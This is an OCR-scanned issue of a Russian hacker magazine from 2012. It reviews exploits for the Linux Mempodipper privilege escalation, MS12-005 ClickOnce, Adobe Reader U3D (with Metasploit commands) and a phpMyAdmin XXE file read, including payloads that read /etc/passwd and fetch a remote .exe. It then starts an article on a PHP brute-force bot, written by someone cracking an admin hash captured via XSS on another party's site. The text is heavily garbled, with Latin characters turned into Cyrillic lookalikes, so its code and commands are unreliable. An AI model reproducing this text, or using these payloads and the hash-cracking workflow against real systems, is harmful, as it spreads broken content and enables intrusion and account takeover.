ОС. Надо отметить, что острее всего проблема проявляется, 
когда сервис поднят именно на внутреннем интерфейсе (127.0.0.1) 
и недоступен на внешнем (0.0. 0.0). В тот раз мне удалось решить 
ее каким-то обходным путем, но недавно я наткнулся на инте- 
ресный пост в блоге ЕІсІаг Магсиззеп. Он написал, что дефолтные 



настройки ІЕ и .МЕТ І^гатеѵѵогк запрещают трафику идти через 
прокси на ІосаІЬозІ и 127.0.0.1. В ІЕ9 эту проблему удалось решить 
за счеттого, что в настройках можно выбрать опцию «не исполь- 
зовать прокси» — «-ІосаІЬозІ». 

Решение, в общем-то, чрезвычайно простое. Во-первых, можно 
обращаться к сервису по любому ІР в 127 подсети, кроме первого, 
например по адресу 127.1.2.3, так как все они относятся к одному 
интерфейсу. Во-вторых, можно прописать в файле локального 
резолва имен Ьозіз (%ѵѵіпсІіг%\сІгіѵег5\ек\Ьо5І5) другое имя для 
ІосаІЬозІ: 127.0.0.1 ІосаІЬОзЕ 



ХАКЕР 03/158/2012 



055 






ВЗЛОМ/ОБЗОР эксплоитов 



Павел Александрович [іѵіпзісіе.ЫодБроТсот] 
Дмитрий Михайлович (115612, дер. Красная звездочка, д.1) 




СѴ55Ѵ2 



ЭКСПЛОИТОВ 



Локальное повышение привилегий в Ііпих 



Ш 



В этом интереснейшем обзоре мы рассматри- 
ваем свежую уязвимость в ядрах Ыпих, позво- 
ляющую без особого труда поднять привилегии 
в системе, баги в МісгозоК ОИ^ісе и АсгоЬаІ: 
Реабег, атакжеХХЕ-инъекцию в рбрМуАбтіп. 
Не пропусти! 



(АѴ:1/АС:1/Аи:5/С:С/І:С/А:С) 

[ДЗШЗ 

Уязвимость связана с интерфейсом /ргос/<РЮ>/тепп (где<РЮ> — 
идентификатор нужного процесса), который Ыпих предоставляет 
для прямой записи в память процесса и чтения из нее. В ядре версии 
2.6.39 разработчики убрали директиву #іСсІеі', исключающую прямую 
запись в память процесса, поскольку сочли, что этот интерфейс уже 
достаточно защищен от неавторизованного доступа с помощью 
других механизмов ядра. На самом деле писать в память процесса 
можетлюбой пользователь, обладающий достаточными правами. 
Какоказалось, эти права проверяются несовсем корректно. В итоге 
получил ось то, что получилось: во всех версиях ядра, начиная с 
2.6.39, злоумыш лен ни к может продвинуть по «карьерной лестнице» 
до рута любого имеющегося пользователя. 
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Обзор эксплоитов 



ЕХРЮІТ 



При открытии интерфейса/ргос/<РЮ>/тепп выполняетсятакой код: 

тет_ореп( іпосіе* іпосіе^ біе* біе) 

{ 

б1е->ргіѵа1;е_сіа1;а = (ѵоісІ*К (1оп^ ^сиггеп1:->5е1-Р_ехес_ісІ^ : 
б1е->б_тосІе |= РМО^Е^^ШеNЕ^_ОРР5ЕТ^ 

геііигп 0; 

} 

Сталобыть, на открытие нетникакихограничений — любой может 
это сделать. Однако на запись и чтение некоторые ограничения всё- 
такиустановлены. Обратимся к коду функции, которая осуществля- 
ет запись (приведена только наиболее важная часть функции): 

5іаііс_5^2е_1; тет_ыг і1:е(5І:гис1 : біе * біе^ 

С0П5І: сбаг изег *Ьиб. зііе і: сошті:. 1обб_1і *рро5^ 

і 

/* ^ ^ ^ * / 

5І:гис1: 1:а 5к _^гис1; *1:а5к = §е1;_ргос_1:а5к( 

б1е->б_ ра1:б.сІеп1:гѵ ->сІ_іпосІе) ; 

/ж ^ ^ ^ / 

тт = сбеск_тет_регтІ55Іоп(1;а5к); 

соріесі = РТК_ЕКК(ттѴ. 

іб (ІБ ЕККГтт)) 

^обо оиб бгее: 

^ ^ ^ 

іб (б1 е->ргіѵа1:е_сіа1:а != (ѵоіс і *)ХіішЮ 

с и г ге ПІ: - > 5 е 1б_ехе с_і сі ) ) 

^обо оиб шт; 

/ж ^ ^ ^ / 

Здесьпроводятся две проверки для предотвращения неавтори- 
зованной записи: сЬеск_тепп_регппІ55Іоп и зеИ'_ехес_ісІ. Функция 

сЬеск_тепп_регппІ55Іоп является простой оберткой для сЬеск_ 

тепп_регппІ55Іоп, вот что она делает: 

Ббабіс збгисб тшзбги сб * сбеск_тет_регтІ55Іоп( 

Ббгисб ба5к_5бгисб *базк^ 

і 

Ббгисб тш Ббгисб *шт: 



тт = ^еббаБкштГбазкѴ. 

іб (!тт) гебигп ЕКК_РТК(-ЕІМѴАП ; 



іб (базк == сиггепб) гебигп тт; 



ІР (ба5к_І5_5бор ресІ_ог_бгасесІ(ба5к) ) { 



У1«ІЧГАѵЬи4ѴІи: I 



№чрс-аіррі!і^ 
зпп ?І. 
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I*] |!<] ЗЕ іо- |?аг«пІ- 
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Пример работы эксплоита Метросііррег 



іпб табсб; 

геи геасі ІоскП : 

табс б = (рбгасе_рагепб(ба5к) == сиггепб); 

гси_геасІ_ип1оск( ) : 

іб (табсб && рбгасе_таѵ_ассе55(ба5к. 

РТКАСЕ МОРЕ АТТАСН^ ^ 

гебигп тт; 

} 



ттриб(тт) : 

гебигп ЕКК_РТК(-ЕРЕКМѴ. 

} 

Чтобы запись прошла успешно, ее должен осуществлять л ибо сам 
процесс (іа5к==сиггепі), либо родитель, трассирующий этот про- 
цесс через рігасе. Различные трюки с рігасе не увенчались успехом, 
поэтому рассмотрим вариант с 1азк== сиггепб Что если процесс сам 
запишет нужные нам да иные себе в память? Очевидно, что наев пер- 
вую очередь интересуют процессы с атрибутом зиіб. Рассмотрим зи: 

$ зи "уеееее баы I ат а соыЬоу" 

зи: изег уеееее баы I ат а соыЬоу сіоез поб ехізб 

Легко заметить, что на зЫегг выдается строка, созданная с нашим 
участием. Казалосьбы, мы можем открыть/ргос/<РЮ>/тет, с 
помощью ІзеекО найти нужное место в памяти, с помощью б ир2() 
связать стандартный потокошибокифайловыйдескриптороткры- 
того/ргос/<РЮ>/тет, записать нужные данные, а затем исполнить 
шелл-код. Однаконевсётакпросто.Здесьвыполняется вторая про- 
верка, входе которой текущее значение зеІІ'_ехес_іб сравнивается 
со значением, с помощью которого был создан файловый дескрип- 
тор/ргос/<РЮ>/тет. Значение зеИ"_ехес_іб инкрементируется при 
каждом запуске процесса, поэтому мы не можем получить доступ к 
памяти вышеизложенным способом. 

Тем не менее, эту проверку можно обойти: с помощью ^огк() мы созда- 
ем потомка и внутри него с помощью ехесО стартуем новый процесс. 
Наш форкнутый процесс имеетзначениезеІ1'_ехес_іб, равное ее 
значению у предка. Когда мы запускаем ехесО, зеИ"_ехес_1б увеличи- 
вается на единицу. В нашем потомкемы открываем памятьпредка и 
создаем файловый дескриптор для/ргос/<РЮ предка>/тет, благо 
на открытие нет проверок. В предке тем временем запускаем зи 
через ехесО, таким образом уравнивая значения зеІ^ехес_іб. Далее 
с помощью, как выразился сам создатель эксплоита, «очень черной 
магии сокетов юникс» передаем предку открытый файловый де- 
скрипторотпотомка и возвращаемся квышеупомянутомусценарию 
бир2 ->ехес. 

Осталосьпонять, по какомуадресуделатьзапись. По идее, А51Р 
должен затруднить нашу задачу, однако взгляни на это: 

$ геабеіб -б /Ьіп/зи | ^гер Туре 

Туре: ЕХЕС (ЕхесибаЫе біе) 

Выводнам какбы намекает, что программа зи использует статиче- 
ский адрес секции .Іехі (вином случае был бы тип ОУМ, а не ЕХЕС). 

Это означает, чтози в большинстве дистрибутивов скомпилирована 
без использования РІЕ, следовательно, А5ЕР для секции .Іехі рабо- 
тать не будет, что упрощает написание эксплоита. 

Исходный кодэксплоита Метробіррегдоступен на ехрІоі1:-бЬ.сот. 
ЕОВ-Ю 18411. Пример его использования представлен на скриншо- 
те. 



ТАК6ЕТ5 



Ып их >=2.6.39, 32- и 64-битные. 



зоіитіом 



Доверь обновление ядра своему пакетному менеджеру или установи 
патч вручную. 
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ВЗЛОМ/ОБЗОР эксплоитов 



2 



М512-005Уязвимость процесса сборки 



СѴ55Ѵ2 



9.3 



( АѴ: М/АС : М/Аи : М/С : С/І : С/А: С) 

Найденная уязвимость позволяет выполнить произвольный код на 
удаленной системе с правами текущего пользователя. Для этого 
пользовательуязвимой системы должензайти на специально сфор- 
мированную ѵѵеЬ-страницу или открытьзлонамеренный файл ОІ^Лсе. 
Уязвимостьприсутствуетв механизмебезопасности 0Ь]ес1 Раскадег. 
Дело в том, что 0Ь]ес1 Раскадег считает СІіскОпсе-файл безопасным, 
благодаря чему файл та кого типа можно внедрить в документ ОІ^Лсе. 
Когда пользовательуязвимой системы открывает документ, внедрен- 
ный файл автоматически выполняется. Напомню, чтоСІіскОпсе — это 
технология развертывания, позволяющая создаватьсамообновляе- 
мые приложения ѴѴіпсІоѵѵз, которые могутустанавливаться и запу- 
скаться при минимальном вмешательстве пользователя. Существует 
три способа публикации приложения СІіскОпсе: с веб-страницы, 
общего сетевого ресурса или носителя, например компакт-диска. Его 
можно установить на компьютер конечного пользователя и запустить 
локально, даже если компьютер не подключен к сети, или запустить 
в оперативном режиме, без установки каких-либо компонентов на 
компьютер конечного пользователя. При этом приложения СІіскОпсе 
могутобновляться самостоятельно, проверяя наличиедоступных 
новых версий и автоматически заменяя все обновленные файлы. 

Для реализации атаки в данном случае используем специальным 
образом сформированный файл презентации РоѵѵегРоіпЕ Эта про- 
грамма позволяетназначитьСизІоіті Апітаііоп'ы для ОЕЕ-пакетов. 

В отличие от обычных анимаций, мы можем задать две специфичные 
для ОЕЕанимации (которые называются 0Ь]ес1 Асііопз): Асііѵаіе 
Сопіепіз (активироватьсодержимое) и Есііі Раскаде (редактировать 
пакет). При Асііѵаіе Сопіепіз выполняются те же действия, что и 
при двойном щелчке пользователя по встроенному объекту. Таким 
образом, Сизіоіті Апітаііоп'ы позволяютвыполнятьуказанные по- 



следовательности действий, требуемых для запуска встроенного 
СІіскОпсе-приложения с полными правами доступа (РиІІТгизі). 

В результате выполнения описанных выше действий на экране 
появится ряд диалоговых окон. Однако пользователю не нужно 
ничего с ними делать. Сизіот Апітаііоп'ы выполняются, когда 
РоѵѵегРоіпІ работаетв режиме показа слайдов. Когда РоѵѵегРоіпІ на- 
ходится в полноэкранном режиме, после выполнения каждого дей- 
ствия анимации происходит восстановление фокуса. После запуска 
СІіскОпсе-приложения мы можем посылатьсообщения диалоговым 
окнам, чтобызакрытьих. 



ЕХРЮІТ 



Уязвимость, описанная в М51 2-005, затрагивает два аспекта: 

1. Метод определения исполняемого файла. 

Непропатченный раскадег.сІІІ определяет, является ли файл испол- 
няемым, сопоставляя расширения файлов с элементам и табл и цы 
(дляудобства назовем ее ехесЕхіТаЫе). 

. 1 :ех 1 ::Ѳ 2 РА 1 Р 98 ехесЕхІіТаЫе с ісі о-р-рзеі: а ехе 

: РАТА ХКЕР: СРаска^е : :_ 6 е 1 :Сиггеп 1 :Ісоп(_ІС *иб 9 |о 
. 1 :ех 1 ::Ѳ 2 РА 1 Р 9 8 ; СРаска^е : :_ 6 іѵеІАІагпіп^Мз?(Н 1 лІМР_ *)+ 5 Е | о 



.-СехТ::Ѳ 2 РА 1 Р 98 ; ".ехе" 



. 1 ;ех 1 ;: 02 РА 1 Р 9 С 


СІСІ 


о-р-РзеІ: 


а_ 


_сот 




" . сот" 


. 1 ;ех 1 :: 02 РА 1 РА 0 


СІСІ 


о-р-р 5 е 1 ; 


а 


Ьа 1 ; 




" . Ьа 1 :" 


. 1 ;ех 1 :: 02 РА 1 РА 4 


СІСІ 


о-р-р 5 е 1 ; 


а 


Іпк 




".Іпк" 


. 1 ;ех 1 ;: 02 РА 1 РА 8 


СІСІ 


о-р-РзеІ; 


а_ 


_стсі 




".стсі" 


. 1 :ех 1 :: 02 РА 1 РАС 


СІСІ 


о-р-р 5 е 1 ; 


а_ 


_РІ-Р 




".оі-Р" 


. 1 :ех 1 ;: 02 РА 1 РВ 0 


СІСІ 


о-р-р 5 е 1 ; 


а_ 


_ 5 СГ 




" . 5 СГ" 


. 1 ;ех 1 ;: 02 РА 1 РВ 4 


СІСІ 


о-р-р 5 е 1 : 


а_ 






' .І5" 


. 1 ;ех 1 :: 02 РА 1 РВ 8 


СІСІ 


о-р-р 5 е 1 ; 


а 


І5Ѳ 




" .І 5 е" 


. 1 ;ех 1 :: 02 РА 1 РВС 


СІСІ 


о-р-р 5 е 1 ; 


а 


ѵЬб 




".ѵЬ 5 " 


. 1 ;ех 1 ;: 02 РА 1 РС 0 


СІСІ 


о-р-р 5 е 1 ; 


а_ 


ѵЬе 




".ѵЬе" 


^ех 1 ; : 02 РА 1 РС 4 


СІСІ 


о-р-р 5 е 1 ; 


а 


Ы5І1 




".Ы 5 М" 


. 1 ;ех 1 ;: 02 РА 1 РС 8 


СІСІ 


о-р-РзеІ; 


а 


5 СТ: 




". 5 СІ;" 


, 1 ;ех 1 ; :. 02 РА 1 РСС 


СІСІ 


о-р-р 5 е 1 ; 


а 


ѵЬ ; 


; ■' 


■.ѵЬ" 


. 1 ;ех 1 ;: 02 РА 1 РР 0 


СІСІ 


о-р-р 5 е 1 ; 


а 


Ы 5 С 




" .Ы 5 С" 






с [?3 .233 .09 .С I по 32 - 



|Отеет от 72.233.09.0: число багіт"32 ороия>240^4с ТТЬ"127 

Сііг ЧИІ>ЛІ) 

|Оі’оет от 72, 233, 69, Ь* число елйт»32 оосня*16Ѳис ТТ^•■і27 
ртвет о г 72*233.69*6- чиило ііййт“32 ТІЬ"І27 



^'тлтнстин* Ріпз дли 72*233*69*6- 

ГІсік^ Г(ііі« о I [ір.\н ЛЁ-І1І1 “ ПГі л учі^-нГі ™ 4^ по г ііііт ^ ^ 

Іірнблнзнте льмое вр&ЕШ прн&ил~передАчн ш ііс = 

= Іббгшігк^^ Максима льнп^? = 24И Сроднил? - 1Н5 исізк 



з&гуср ПйПе (йг І92-168-0-2: 

Зегоег- дооу 1е-р«Ыіс“гіп5-а,доод1е - СОИ 
ГісІсІге55: 



Моп-схіаісгіі: Лопйіп 



: ІЬ,іюггірген5 -СОИ 

74 ,20О*243 -251, 72-233-2-58, 
76,74.254-123, 74-200-244-59 
і^ііазез : екріо і!:зІшр-чюгЛрге55 - сои 



72-233-69,6, 76, 74, 254 -120 
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Обзор эксплоитов 



.1:6x1:: 02 РА1РР4 сісі о-р-рзеі: а_ы5-Р : ".ыз-Р" 
. 1:6x1: :Ѳ2РА1РР8 сісі о~Р1^5е1: а ышг ; ".ыші" 



Просто прокручивабм в циклбэтутаблицу и смотрим, имббтли 
встроенный файл такое жб расширение, как и элемент табл и цы. Для 
этого используется функция ІзРгодЮІпизІ: 

.1:ех^:Ѳ2РА72Р4 ризіі Иб ; іпі: 

.1:ехі:02РА72Р6 ризІі оі^і^зеі: ехесЕх1:ТаЫе ; сІ ап^егоизТаЫ е 
.1: ех1:: 02РА72РВ ризіі езі ; рЕхіМате 

,1:ех1::02РА72РС ризіі 0 ; іпі: 

,1:ех1::02РА72РЕ саіі ?І5РгоеІРІпІІ5^(а(аУ6НРВ60РВОВ6Ка2 

: І5Рго§ІРІпІІ5І:(и5Ііог1: сопзі: *.изІіог1: сопзі: *. 

: изііогі: сопзі: * сопзі: *.иіп1:) 

Нюанс состоит в том, что в таблице приведена лишь часть 
существующихрасширений для исполняемых файлов. В качестве 
примера можно взять РУ или рі. М51 2-005 обходит эту проблему с по- 
мощью функции АззосІзОапдегоизО, которая проверяет расширения 
исполняемых файлов: 




Вредоносное содержимое 30-объекта втеле рсI^файла 



.1:ех1: :02РА6А11 ризіі еах 

.1:ех1:: 02РА6А12 саіі сіз: ішр А ззосІзРапеегоизОД 

; АззосІзРап^егоизГх) 

,1:ех1::02РА6А18 1:ез1: еах, еах 

.1:ех1::02РА6А1А дпі зііог^ 1ос_2РА6А42 

2. Вывод предупреждений системы безопасности пользователю. 

Пропатченный раскадег.сІІІ выдает предупреждения, только если 

файл является исполняемым. Но рассмотрим функцию СРаскаде 

6іѵеѴѴагпіпдМзд(НѴѴМ0 ЬѴѴпсІ). Она вновь проходит по таблице 
ехесЕхіТаЫе, и, если расширение встроенного файла не содержится 
в ехесЕхіТаЫе, никаких предупреждений не выдается. 



ТАК6ЕТ5 



ѴѴіпбоѵѵзХР, ѴѴіпбоѵѵзѴізІа, ѴѴіпсІоѵѵз5егѵег20085Р2, ѴѴіпбоѵѵз 7. 



• А — имя, под которым должна быть активирована аннотация. 

• РО — аннотация должна активироваться, как только открывает- 
ся страница, содержащая аннотацию на 30-данные. 



ЕХРЮІТ 



Последовательность запуска объектов: 

• Объект 4 — действие ОрепАсІіоп инициирует обращение к 
ЗаѵаЗсгірЕ 

• Объект 14 — ЗаѵаВсгірІ ссылается на объект 15. 

• Объект 15 — Заѵа5сгірІ-код применяеттехнику Ьеар зргауіпд, 
затем переходитна вторую страницу. 

• Объект 11 — определениеЗО-данных и описание их форматирова- 
ния. 

• ОбъектЮ — 30-данные, которые будутпоказываться (вероятно, 
поврежденные). 



зоіитіом 



Существует обновление, устраняющее эту уязвимость. 



3 



Уязвимость в АсІоЬе Кеасіег при обработке 
изо-данных 



СѴ55Ѵ2 



10.0 



(АѴ:М/АС:Е/Аи:М/С:С/І:С/А:С) 

[3323 

Уязвимостьвызвана ошибкой при обработке 030-данных. Такая 
ошибка может привести к сбою. При успешной эксплуатации эта 
уязвимость позволяетзлоумышленникам установить полный 
контроль над системой. Для обхода ОЕР используется РОР-цепочка, 
основанная на библиотеке ісиспѵЗб.сІІІ. Для обхода А5ЕР выполняет- 
ся Заѵа5сгірІ-код, реализующийтехнику Ьеарзргауіпд. 

Кратко опишем 030-компоненты, чтобы лучше понимать, какие из 
них использует сплоит: 

• 030 — натекущий моментединственный поддерживаемый под- 
тип и 30-объект. 

• 300 (необходим) — определяетпотокили словарьеЗО-данными, 
подлежащими рендерингу. 

• ЗОА (необязателен) — словарь активации, определяющий время, 
когда следует показывать 30-данные. 

• 301 (необязателен) — переменнаялогическоготипа, определяю- 
щая основной режим использования. Значение Ігие соответствует 
интерактивному режиму, І^аізе — взаимодействиючерез ЗаѵаЗсгірЕ 

• 015 (необязателен) — имя, определяющее состояние 30-данных 
при деактивации. 



Объекты, на которые следует обратить внимание: 

• Объект 10 — ссылается на именованные словари (/30, /030). 

• Объект 11 — ссылается на именованные словари (/301, /300, /30, 
/ЗОА). 

• Объект 15 — содержит ЗаѵаЗсгірІ-коддля реализации Ьеар 
зргауіпд и перенаправления на вторую страницу (инициирует 
процесс отображения 30-данных). 

Сплоит реализован в Меіазріоіі (пример с полезной нагрузкой в виде 
запуска калькулятора): 

Ш5-Р > изе ехр1оі1:/ыіпсІоы5/1і1е1^огпіа1:/асІоЬе_геасІег_иЗсІ 

Ш5-Р ехр1оі1:(асІоЬе_геас1ег_иЗсІ) > зеі: рауіоасі ыіпсіоыз/ехес 
рауіоасі => ыіпсіоыз/ехес 

тз-Р ехр1оі1:(асІоЬе_геасІег_иЗсІ) > зеі: стсі саіс.ехе 

стсі => саіс.ехе 

Ш5-Р ехр1оі1:(асІоЬе_геасІег_иЗсІ) > зііоы ор1:іоп5 

Мосіиіе ор1:іоп5 (ехр1оі1:/ыіпсІоы5/1і1е1^огта1:/асІоЬе_геасІег_иЗсІ) : 

Мате Сиггепі: 5е1:1:іп§ КедиігесІ 0езсгір1:іоп 



РІІЕМАМЕ тз1=.рсН= уез ТІіе біе пате 

ОВРІІ5САТЕ -Раізе по ЕпаЫе 35 оЬ-Ризса1:іоп 



Рауіоасі ор1:іоп5 (ыіпсіоыз/ехес) : 

Мате Сиггепі: 5е1:1:іп§ КедиігесІ 0езсгір1:іоп 



СЮ 


саіс.ехе 


уез 


ТІіе соттапсі з1:гіп§ 1:о 








ехеси1:е 


ЕХІТРОМС 


ргосезз 


уез 


Ехіі: 1:есІіпідие: 








5еІ1^1:І1геасI^ ргосезз ^ попе 
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ВЗЛОМ/ОБЗОР эксплоитов 



Ехріоіі: 1іаг^е1:: 



ІСІ 


Мате 











0 


АсІоЬе Кеасіег 9.4.0 / 9.4.5 


/ 9.4.6 оп ІЛІІП ХР 5РЗ 


т5-Р 


ехоІоіѣСасІоЬе геасіег иЗсІ) 


> ехріоіі; 


Ш- 


Сгеаіііпр 'тз-Р.рсІ-Р' біе... 





[ + ] ШБ-Р.рсі-Р 5І;огесІ а1: /Ііоте/ріко-РагасІ/ .гп5-Р4/1оса1/т5-Р. рсі-р 



ТАК0ЕТ5 



АсІоЬе Реасіег 9.4.0 /9.4.5 /9.4.6 под ѴѴіпсІоѵѵзХРБРЗ. 



зоіитіом 



Существует обновление, устраняющее эту уязвимость. 

ІРІ в рИрМуАсІтіп через ХХЕ-инъекцию 



СѴ55Ѵ2 5.0 



(АѴ:М/АС:1/Аи:М/С:Р/І:М/А:М) 

в начале года исследователь Магсо Ваіізіа опубликовал весьма 
интереснуюуязвимостьтипа ІосаІ Рііе Іпсіисііпд. Эксплуатируется 
она нетривиально, черезХХЕ-инъекцию (ХХЕ — ХМЕеХіегпаІ ЕпЛіу), 
которая представляетсобой разновидностьХМЕ-инъекции. 

Напомню, что при помощиХМЕ-инъекции (например, 6ЕТ- 
запроса к веб-серверу) можно изменитьсодержимоеХМЕ- 
документа. Обычно интерес представляют файлы базы данных 
хтЮВ, гдесодержится информация о пользователях: 

<?хт1 ѵег5Іоп="1.0" епсосІіп§="І50-8859-1" ?> 

<изег5> 

<изег> 

<и5егпате>§апсІа1-Р</и5егпате> 

<ра55ыогсІ> ! сЗ</ра55ыогсІ> 

<ц5егісІ>Ѳ</и5егісІ> 

<таі1>§апсІа1-Р@тісІсІ1ееаг1;Іі . сот</таі1> 

</ц5ег> 



<и5ег> 

<и5егпате>51;е-Рап0</и5егпате> 

<ра55ЫОГСІ>ЫІ53С</ра5 5ЫОГСІ> 

<ц5егісі>500</и5егісі> 

<таі1>51:е-Рап0@ыІіу5ес . Іітт</таі1> 
</и5ег> 



<и5ег> 

<и5егпате>1:опу</и5егпате> 

<ра55ыогсІ>ип6К34кЬ! е</ра55ыогсІ> 

<и5егісі>500</и5егісі> 

<таі1>541;ап@Ііе11. сот</таі1> 

</и5ег> 

</и5ег5> 

Смышленый читатель без труда проведетаналогиюсВОЕ- 
инъекциями, а ятем временем перейду непосредственно к инъек- 
циям подтипаХХЕ. В доку ментах ХМ Е существуют та к называемые 
примитивы (епЛЛез), которые объявляются в начале документа в об- 
ласти ОТО. Существует несколько видов примитивов, но сейчас нас 
интересуюттолько внешние (ехіегпаі епЛЛез). Если в определении 
примитива присутствует ЕІРІ, то он называется внешним. Соответ- 
ственно, парсердолжен получитьдоступ кэтому ЕІРІ и включитьего 
содержимое в документ, если это было задано, например, так: 

<?хт1 ѵег5Іоп="1.0" епсосІіп§="и1:-Р-8" ?> 

<!ООСТУРЕ -Роо 



[ 

<!ЕЕЕМЕМТ -Роо АМУ > 

<!ЕМТІТУ Ьаг 5У5ТЕМ "Рііе : ///е1;с/ра55ысі" > 

] 

> 

<-Роо>&Ьаг :</-Роо> 

Здесьопределяется примитив Ьаг, который ссылается на файл /ек/ 
раззѵѵсі, и при обработке документа его содержимое включается 
в него. Кстати говоря, вХМЕ-документможно нетолько включать 
локальные и удаленные файлы. 

В нем можно за пускать исполняемые файлы, если парсеру раз- 
решено это делать. По стандарту это вы глядит примерно та к: 

<?хт1 ѵег5Іоп="1.0" епсосІіп^="и1:-Р-8"?> 

<!ООСТУРЕ -Роо 

[ 

<!ЕЕЕМЕМТ -Роо АМУ> 

<!МОТАТІОМ 61 Р 5У5ТЕМ 

" Ы;1;р : //ту- сооі - 5І1;е . сот/5ЬоыСі-р . ехе" > 

<!ЕМТІТУ Ьаг 5У5ТЕМ "Ы;1;р://по1;-ту-соо1-5І1;е.сот/Ьаг.§і-р" 
МОАТА СІР> 

] 

> 

<-Роо>&Ьаг;</-Роо> 

В этом документе с помощью программы ВЬоѵѵбіЕехе обрабатыва- 
ется рисунокЬаг.діЕ В некоторыхслучаях мы можем внедритьпо- 
добную конструкциючерезХМЕ-инъекцию и выполнитьтребуемый 
код. Более подробная инфа обХМЕ-инъекцияхестьна сайте 0ѴѴА5Р 
[ доо.д1/В869С ]. 



ЕХРЮІТ 



В рЬрМуАбтіп имеется функция импорта базы данных из заданного 
п ользовател ем ХМ Е-фай л а. Уязвимость заключается в том, что по- 
сле загрузки специально сформирован ного ХМ Е-доку мента атаку- 
ющий получает возможность (ограниченную правами веб-сервера) 
прочитать произвольный файл в системе или локальной сети. 

Уязвимость находится в файле ІіЬгагіе5\ітрогі\хппІ.рЬр, где 
функция 5ІтрІехппІ_ІоасІ_5кіпд() вызывается без проверки на суще- 
ствование ссылки на внешний примитив: 

$хт1 = 5Ітр1ехт1_1оасІ_5І:гіп^($Ьи-р-Рег. 

"БітрІеХМЕЕІетеШі" . ЕІВХМЕ СОМРАСЛ ; 

Патченные версии рЬрМуАсІппіп для предотвращения инъекции 
используют функцию ІіЬхтІ_сІІ5аЫе_епЬіу_ІоасІег(), прежде чем за- 
гружать ХМ Е-документ. 

Компания 5ЕСР0РСЕ разработала модуль к Мекзріоіі для экс- 
плуатации этойуязвимости. Он автоматизируетпроцесс ЕРІ следую- 
щим образом: 

1. Логинится в рЬрМуАбтіп с помощью предоставленных реквизи- 
тов. 

2. Создает ХМ Е-документ, применяяХХЕ-инъекции для задан ного 
файла. 

3. Загружаетфайл сХМЕ-документом. 

4. Получает указанный файл с сервера. 

Возможные опции эксплоита и пример успешной эксплуатации по- 
казаны на скриншоте. 



ТАК6ЕТ5 



РЬрМуАбтіп 3.4.x вплоть до 3.4. 7.1 и 3.3.x вплоть до 3.3. 10. 5. 



зоіитіом 



Обновиться минимум до версии рЬрМуАсІппіп 3.4.7.1 (3.3.10.5) или 
установить соответствующий патч. 
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понтг 

автомобилей 



Журнал для тех, 
кто заметен в потоке 



Реклама 




взлом 



ІдЬгІ (Нир://е55еп20.пеі) 




КОДИМ БОТА для РАСПРЕДЕЛЕННЫХ 
ВЫЧИСЛЕНИЙ 




Существует огромное количество 
языков программирования. 
Кто-то выбрал для себя С, кто- 
то — А5М, а кто-то — РуіИоп. Я, 
например, отдал предпочтение 
не самому экзотическому 
языку — РНР. А всё потому, 
что мне чаще приходится 
работать с вебом, чем 
с десктопом. Но бывают и такие 
моменты, когда тебе нужен 
специализированный софт, а его 
просто-напросто нет. 



РО Ц 5РЕАК ЕМ6Ы5Н? N0, РНР 

Однажды, во время очередных ковыряний очередной Х55, ко мне 
в логи попал хеш пароля администратора нужного мне ресурса. Ко- 
нечно же, его необходимо было расшифровать, и я сразу обратился 
к различным онлайн-сервисам, помогающим с расшифровкой. 

Ни один из них мне не помог. 

С этой душевной печалью я отправился на хак-форумы, где 
в специальных разделах оставил просьбу о помощи в расшифров- 
ке. Но и там меня ожидал фейл. Однако сайтик был весь из себя 
расчудесный, и бросать его админку мне совсем не хотелось. 
Заварив очередную кружку кофе, я начал думать, как поступить. 
Брутить на своей машине не получилось бы — процессор слабоват. 
Значит, нужно было где-то взять компьютер с хорошими характе- 
ристиками, и желательно не один. Покупать себе домой 20 новых 
мощных серваков ради расшифровки одного хеша как-то не входи- 
ло в мои планы. Поэтому я купил несколько выделенных серверов 
для распределения вычислений у одного хостера. Осталось всего 
ничего — настроить расшифровку. И воттут я решил углубиться 



У}Щ}1 



словари для брута 
отАнтичата; 

один из консольных 
брутеров; 

конвертер батников. 



гш 

На нашем диске 
ты сможешь найти 
все необходимые 
файлы и исходники, 
описанные в статье. 
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РНР-бот для ѴѴіпсІоѵѵз 



С-"^рЬр_сопрі1ег>с ~ч С:^РНР„І^го^есі5^Л^Ь_.Нй5Ь^.^е|:1іе ^ді^ 1 '^ пі"!!:» * рЬрі/ піІЬ.ехе 

ВопЪ^Іагч ГИР ЕХЕ СапріІеіѴЕпЬссЛііег І*І 

^іпсіоііесі Арр1ісл(;іап 

Спп|ігп$^ 

ЛліпГ ііе < пЛ5 -ріірѵ 

ОмйРіІе! піі.5*еке 

Р|^о^сс^ Аіі^і с 5\^^1^1[_^;1Ігй^есС5Nп(С5_Ьд5Ь^епе!^лСе1^x 



|НпСті|п^ 
псосііпд 
іісо^іпд 
Епсосііпд 
Рпсосііпд 
Епсосііпд 
Епсосііпд 
Епспсііпд 
Епсосііпд 
Сопргойз 
Сопрге!^5 



апН апНс^сІсІіпд іпс 
лпЛ епІі«сІсІіпд іпс 
агиі Ёіі1к<;(1<11гід ІпС 
лпсі спЬесІсІіпд іпс 
апД епЬесІсІіпд іпс 
апсі епЬесісІіпд іпс 
Апсі епЬесісііпд іпс 
ап4 огііиісісііпд іпс 
апсі епЬесІсІіпд псі^ 
іпд Ріпаі ехе-_ 
іоп сіопе 



ІисІп^сІЬУсІЬ_со™іоі» , і*пс ^ рЬр 
1и^^еУсі^^^Ус^Ь^пу5^ 1 , іпс * рЬр 
ииІеУ<11>/<ІЬ_5с|]| Не * Іпс *рЬр 
Іисіс/Р і/і^ гее іс^Аде . іпс .р)ф 
1ис1еУмЬ_деп е г іс * іпс і. рЬр 
1ис1с/иЬ_геЁйигсе^ . іпс .ріір 
ІіісІеУмЬ_м ІПСІО У5 - іпс - рЬр 
ІисІеУи іпЫпсІег , рЬр 
. рИрѵ? 



тсі5.ехе йгеа^есі ^иссе&^^ГиІ 



ІГ::ЧрВр_сопрі 1пг> 



Компилимбот 



в процесс. А почему бы не написать бота, принимающего команду 
на расшифровку хеша с общего сервера? Можно было и написать, 
только вот проблема заключалась в том, что я знал только скрипто- 
вые языки, а с десктопом никогда не имел дела. И тут в моей памя- 
ти всплыла такая вещь, как всевозможные рЬр2ехе-компиляторы. 

ОБЩАЯ СХЕМА 

Бота я решил заставить действовать по вполне определенному 
плану. Итак, существует сервер, на который добавляются «за- 
дания». Боты отстукивают на него каждые пять минут, проверяя, 
не появилось ли для них новое задание. 

И если появилось, посылают серверу сигнал о том, что брут 
начался. Сервер, в свою очередь, добавляет в базу запись о том, 
кто работает, а кто — нет. После завершения брута бот отправляет 
серверу запрос с уведомлением, что работа окончена. Этот запрос 
